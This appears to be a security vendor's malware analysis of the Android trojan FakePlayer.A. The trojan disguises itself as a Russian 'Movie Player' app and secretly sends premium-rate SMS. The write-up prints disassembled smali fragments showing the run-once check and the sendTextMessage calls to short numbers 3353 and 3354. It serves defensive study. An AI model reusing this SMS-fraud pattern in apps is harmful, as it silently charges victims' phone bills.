Mobile Virus

Android/FakePlayer.A!tr

Analysis

This trojan affects mobile phones running on the Android platform.
The trojan takes the appearance of a movie player for the Russian community. But, actually, the malware sends 3 SMS to two Russian premium numbers.


Technical Details


The trojan installs on the mobile phone under the name of "Movie Player".
The mobile phone warns the end user the trojan has the capability of sending SMS (but an unsuspecting end-user might still want to install the application):

Figure 1. Installation warning

After installation, the trojan's "Movie Player" icon appears in the application panel:

Figure 2. The trojan is installed

Launching the malware for the first time displays a message in Russian:


Figure 3. Russian message translated by Google
During that time, the trojan sends SMS messages.
The malicious sample is included in a Android application package file (.apk extension).
This setup package contains the core application code (.dex), the resources (icon, string, ...), the corresponding manifests and hashes of these files like the following:
res/drawable/icon.png
res/layout/main.xml
res/values/strings.xml
res/values/public.xml
META-INF/MANIFEST.MF
META-INF/CERT.RSA
META-INF/CERT.SF
classes.dex
resources.arsc
AndroidManifest.xml

The core "classes.dex" is a Dalvik Excutable. The .dex is executed by the Android Virtual Machine that uses specific byte code. The byte code may be disassembled:
.class public Lorg/me/androidapplication1/MoviePlayer;
.super Landroid/app/Activity;
.source "MoviePlayer.java"


# direct methods
.method public constructor ()V
    .locals 0

    .prologue
    .line 22
    invoke-direct {p0}, Landroid/app/Activity;->()V

    return-void
.end method

Additionally, the XML manifest shows the "entry point" of the malware: it is themovieplayer class. See below:
  <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
  </activity>
The class reveals that the malicious behavior is effective once: the trojan checks a database entry via a routine called "canwe" and sets a flag. If the flag is already set, the trojan does not send any SMS.
 .line 29
    .local v6, dh:Lorg/me/androidapplication1/DataHelper;
    invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;->canwe()Z
    move-result v2

    if-eqz v2, :cond_0

The malware sends SMS to two Russian premium number. One of those numbers is used twice.
.line 54
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 55
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 57
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;
   ->sendTextMessage(Ljava/lang/String;Ljava/lang/String;
   Ljava/lang/String;Landroid/app/PendingIntent;
   Landroid/app/PendingIntent;)V
...
    .line 63
    :goto_0
    const-string v1, "3354"
...
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;
    ->sendTextMessage(Ljava/lang/String;Ljava/lang/String;
    Ljava/lang/String;Landroid/app/PendingIntent;
    Landroid/app/PendingIntent;)V
...
    const-string v1, "3353"
...
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;
    ->sendTextMessage(Ljava/lang/String;Ljava/lang/String;
     Ljava/lang/String;Landroid/app/PendingIntent;
     Landroid/app/PendingIntent;)V
    :try_end_2 

Also, the malware author probably coded his malware out of the "HelloWorld" in the Android SDK. The hint comes from the "main.xml" file of the layout ressources:
<?xml version="1.0" encoding="UTF-8"?>
<LinearLayout android:orientation="vertical" 
                               android:layout_width="fill_parent" 
                               android:layout_height="fill_parent"
                               xmlns:android="http://schemas.android.com/apk/res/android">
<TextView android:layout_width="fill_parent" 
       android:layout_height="wrap_content" 
       android:text="Hello Android from NetBeans" />
</LinearLayout>

The corresponding class isn't called, probably it was used to test the sending SMS methods. We found a different russian message that can be translated in "Click OK to access the video library".

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.